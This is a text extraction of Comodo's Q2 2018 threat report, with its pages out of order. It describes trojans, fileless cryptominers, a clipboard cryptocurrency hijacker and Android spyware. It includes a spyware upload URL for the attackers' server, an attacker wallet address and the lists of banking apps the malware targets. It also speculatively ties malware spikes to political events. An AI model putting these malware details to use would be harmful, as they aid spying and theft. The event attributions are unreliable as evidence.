Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
